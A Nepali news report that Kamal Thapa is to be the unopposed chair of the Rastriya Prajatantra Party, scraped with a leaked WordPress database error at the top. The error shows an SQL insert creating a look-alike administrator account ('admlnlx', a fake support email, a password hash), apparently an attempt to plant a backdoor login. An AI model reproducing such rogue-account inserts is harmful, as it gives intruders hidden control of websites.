WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6yCR6c4HGrl1KplGteNhT3.ETB2vY.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 01:00:17', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ५-
राष्ट्रिय प्रजातन्त्र पार्टीको अध्यक्षमा कमल थापा सर्वसम्मत चयन भएका छन् ।
थापालाई एकता अधिवेशन हुनुभन्दा दुई दिनअगावै सर्वसम्मत अध्यक्ष बनाउन पार्टीका शीर्ष नेताहरु सहमत भएका हुन् ।
राप्रपा र राप्रपा नेपालको एकतापछि बनेको राप्रपाले फागुन ६ देखि ९ सम्म एकता महाधिवेशन गर्दैछ । महाधिवेशनको पूर्वसध्यामा थापासँगै पशुपति शम्शेर राणा र प्रकाशचन्द्र लोहनी अध्यक्षका दाबेदार थिए ।
तर, तत्कालीन राप्रपा नेपालका अध्यक्ष रहेका थापा हावी भएपछि राणा र लोहनी क्रमशः पछि हटे । थापा अब सर्वसम्मत अध्यक्ष बन्नेछन् ।
थापालाई अध्यक्ष बनाउने सम्झौता पत्रमा शीर्ष नेताहरु पशुपति राणा, लोकेन्द्र चन्द र प्रकाशचन्द्र लोहनीले हस्ताक्षर गरेका छन् । थापालाई एकता महाधिवेशनमा अध्यक्ष घोषित गरिनेछ ।
हेर्नुस् विज्ञप्तिः
